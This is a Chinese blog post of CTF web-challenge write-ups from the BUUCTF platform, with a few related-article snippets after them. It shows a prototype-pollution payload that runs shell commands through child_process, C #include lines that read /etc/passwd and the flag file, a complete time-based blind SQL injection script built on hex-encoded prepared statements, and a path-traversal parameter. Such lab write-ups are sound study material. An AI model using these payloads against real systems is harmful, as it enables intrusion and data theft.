寒假学习01

最新推荐文章于 2023-12-13 13:53:56 发布
最新推荐文章于 2023-12-13 13:53:56 发布
阅读量2.7k 收藏 1
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxtcxtcxt1234/article/details/122527567
版权

[GYCTF2020]Ez_Express

F12有提示

下载下来根据提示

在代码中找到

 在登录中会的过滤admin但是会小写字母转换为大写字母

利用toUpperCase实现伪造ADMIN登录

在Character.toUpperCase()函数中,字符ı会转变为I,字符ſ会变为S。
在Character.toLowerCase()函数中,字符İ会转变为i,字符K会转变为k。

 登录成功之后

 就是/action路由里面的

router.post('/action', function (req, res) {
  if(req.session.user.user!="ADMIN"){res.end("<script>alert('ADMIN is asked');history.go(-1);</script>")} 
  req.session.user.data = clone(req.body);
  res.end("<script>alert('success');history.go(-1);</script>");  
});
router.get('/info', function (req, res) {
  res.render('index',data={'user':res.outputFunctionName});
})

可以看到就将提交的数据交给clone处理

const clone = (a) => {
  return merge({}, a);
}//很明显的原型链污染

-----------------------------------------------------------------------

知识点​​​​​​

这两位师傅讲的已经很清楚了

初探JavaScript原型链污染 - Escape-w - 博客园 (cnblogs.com)

Express+lodash+ejs: 从原型链污染到RCE - evi0s' Blog

-----------------------------------------------------------------------

最后payload

{"__proto__":{"outputFunctionName":"a; return global.process.mainModule.constructor._load('child_process').execSync('cat /flag'); //"}}

[FireshellCTF2020]Caas

打开是一个编译器

之后会下载一个文件,不太明白什么意思

尝试利用c 语言看看能不能打开文件

看了WP才知道flag应该是以文件形式存在服务器中,要尝试使用#include ''预处理编译报错

尝试包含文件/etc/passwd,构造代码:

#include "/etc/passwd"
#include "/flag"

 得到flag

[SWPU2019]Web4

点登陆没反应,注册提示未开发,猜测sql注入

 单引号报错,加;之后成功

参考wp是要堆叠注入,并且过滤了很多关键字,需要用十六进制和预处理语句注入。

利用MySql预处理

在遇到堆叠注入时,如果select、rename、alter和handler等语句都被过滤的话,我们可以用MySql预处理语句配合concat拼接来执行sql语句拿flag。

PREPARE:准备一条SQL语句,并分配给这条SQL语句一个名字供之后调用
EXECUTE:执行命令
DEALLOCATE PREPARE:释放命令
SET:用于设置变量
这里贴一个师傅写的脚本

#author: c1e4r
import requests
import json
import time

def main():
    #题目地址
    url = '''http://568215bc-57ff-4663-a8d9-808ecfb00f7f.node3.buuoj.cn/index.php?r=Login/Login'''
    #注入payload
    payloads = "asd';set @a=0x{0};prepare ctftest from @a;execute ctftest-- -"
    flag = ''
    for i in range(1,30):
        #查询payload
        payload = "select if(ascii(substr((select flag from flag),{0},1))={1},sleep(3),1)"
        for j in range(0,128):
            #将构造好的payload进行16进制转码和json转码
            datas = {'username':payloads.format(str_to_hex(payload.format(i,j))),'password':'test213'}
            data = json.dumps(datas)
            times = time.time()
            res = requests.post(url = url, data = data)
            if time.time() - times >= 3:
                flag = flag + chr(j)
                print(flag)
                break

def str_to_hex(s):
    return ''.join([hex(ord(c)).replace('0x', '') for c in s])

if __name__ == '__main__':
    main()

结果glzjin_wants_a_girl_friend.zip可以下载到源码。代码审计

经过观察发现在

BaseController.php中有任意变量覆盖

 继续观察只有在

UserController.php里面可以改变

 

 观察userIndex.php

 在这里我们可以将img_file修改为/../flag.php

 还需要注意一点需要将r赋值为User/index

 才能进入图片显示

payload:
?r=User/Index&img_file=/../flag.php

kutouxiyiji0220
关注
buu-[FireshellCTF2020]Caas
qaq517384的博客
10-22 430
打开环境是一个代码运行界面 直接输入一个cat /flag,显示报错 可以看到文件名/tmp/caas_6l09k25y.c(每次都不同),以及我们输入的代码 编译一个hello word #include <stdio.h> int main() { printf("Hello, World! \n"); } 会弹出一个下载文件 运行也能正确输出 写了个读flag的脚本,后来发现,载下来的本地脚本跟环境的flag没有一点关系,淦 回到开始的报错 多打了一个字导致报错:找不到文件
01【申报表】2015年吉林大学寒假社会实践团队活动申报表.doc
09-08
7. **深化专业社会实践**:加强专业实践与学习的结合,利用产学研合作平台,结合学科特色进行专业实践活动。 8. **深化教育关爱服务**:前往教育资源匮乏地区,提供教师培训,提升教学质量,并关注城市贫困家庭、...
[FireshellCTF2020]Caas
cjdgg的博客
07-04 532
题目一进去如下所示 他要求我们输入代码然后其帮我们编译 emem试了下<?php phpinfo(); ?> 看到这报错,说实话,我也不知道报的是啥错平时一般用的php和python较多,但按照Sorry, we could not compile this code.,这意思百分之百不是php,那就上网搜一些别的语音的代码 #include <stdio.h> int main() { printf("Hello, World! \n"); return 0
BUUCTF--[FireshellCTF2020]Caas
qq_46263951的博客
07-28 272
考点: #include ''预处理编译报错 文件包含 使用 # include "/flag" ,使flag可以在错误提示中出现
[FireshellCTF2020]Caas c语言预编译的文件包含
最新发布
m0_64180167的博客
12-13 403
发现返回了一个文件 执行是我们的代码 所以这里其实是c语言的编译器没错了。这里我们可以通过 #include 引入文件 然后进行包含。发现成功读取到了 这里我们直接读取flag。报错 这里我们查询一下 是c语言的编译。我们尝试输入正确的代码。
九年级政治寒假作业 专题01 责任、代价与回报(学) 试题.doc
11-08
这篇文档是针对九年级学生的政治寒假作业,主题集中在责任、代价与回报这一专题。以下是相关知识点的详细说明: 1. **责任的含义**:责任涵盖了一个人应当去做的事情以及避免做的事情。它源于社会关系中个体之间的...
请用python和excel写一个显示每日天气的寒假学习计划表
09-09
在使用Python和Excel创建一个显示每日天气的寒假学习计划表的项目中,我们可以使用Python中的openpyxl库来操作Excel文件,并使用API获取每日的天气数据。 首先,我们需要安装openpyxl库。在命令行中运行以下命令: ...
九年级政治寒假作业 专题01 责任、代价与回报(测)(含解析) 试题.doc
11-08
例如,作为学生,完成学习任务是来源于法律的规定和道德的期待;作为子女,孝敬父母是来源于传统的习俗和道德责任。 2. **责任的代价与回报**:承担责任通常伴随着付出代价,如时间、精力甚至可能的物质损失。...
2020_2021学年八年级物理上学期寒假作业预习练01力力的描述含解析20210225232
08-07
这篇资料主要涉及初中物理中的力和力的作用效果,适合八年级的学生进行预习和练习。以下是根据标题、描述和部分内容...通过完成这样的预习练习,学生能更好地准备接下来的课程学习,增强对物理现象的理解和分析能力。
BUUCTF [FireshellCTF2020] Caas
Senimo
01-11 769
BUUCTF [FireshellCTF2020] Caas 考点: #include ''预处理编译报错 启动环境: 提示是一个代码编译功能,尝试输入<?php echo 'Hello'; ?>,得到了报错: 根据报错发现是C语言编译器,输入: #include <stdio.h> int main() { printf("Hello, World! \n"); return 0; } 编译后下载了一个文件: 开始以为和这个文件有关,但是后续尝试中发
-------已搬运--BUUCTF:[FireshellCTF2020]Caas ----观测报错消息
Zero_Adam的博客
04-20 329
一、自己做: 这个报错,,不认识, 这是什么编译的东西啊,, 二、学到的&&不足: 三、学习WP 这个后缀是.c的意思就是C语言的源代码,或者是预编译的。 Linux中生成的是.out。 然后window里的是exe文件后缀, 然后想一下,用C语言的语法来弄一下,, ??? 这个c语言的东西,第一句话就是包含头文件的意思,,, md,C像没学一样。 看看报错,说是期望""双引号或者<>尖括号试一试看看 ...
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 4158
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
[FireshellCTF2020]Caas C的预处理
qq_54929891的博客
05-15 374
进入可以看到是一个编译器 ,输入简单的php代码试试 <?php phpinfo();?> 不知道什么的报错,直接复制报错代码百度一下看看(仔细地可以看见最前面有一个后缀.c) 发现清一色的C语言报错,那我们找个c语言代码传进去试试 #include <stdio.h> int main() { printf("hello, world"); } 下载出来一个不知什么文件 思路到这里就断了,其实可以猜到flag在服务器的某个文件下,也许..
FireShell CTF 2019小记
郁离歌丶的博客
03-20 1012
FireShell CTF 2019小记 8说了,国际赛的难度大家都晓得滴。看题 Python Learning Environment 沙盒逃逸orz,最近喜欢玩的一个东东。 在前端的python.js里面可以看到一些waf源码。不过还没有我自己fuzz来的快,毕竟前端也不是很熟,源码又太多。 fuzz结果:不能用数字,不能用[],还有一堆常见的关键词需要绕过。以及内置函数只剩下exec和pri...
FireShell CTF 2020 Re Simple Encryption
Hk_Mayfly的博客
03-23 259
1.代码分析 __int64 __fastcall sub_401CA0(signed int a1, __int64 *a2) { __int64 v2; // rsi __int64 v3; // rcx __int64 v4; // rdi __int64 v5; // rdx __int64 result; // rax __int64 v7; // r...
2020寒假前端小白HTML&CSS学习实战与心得
在这个长达寒假的特殊时期,博主以一个前端新手的身份,分享了自己2020年寒假学习HTML和CSS的心得体会,以及六大项目实战经验。文章起始于对疫情下人类团结互助的感慨,引出作者对web前端技术的热情投入。 博主强调...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值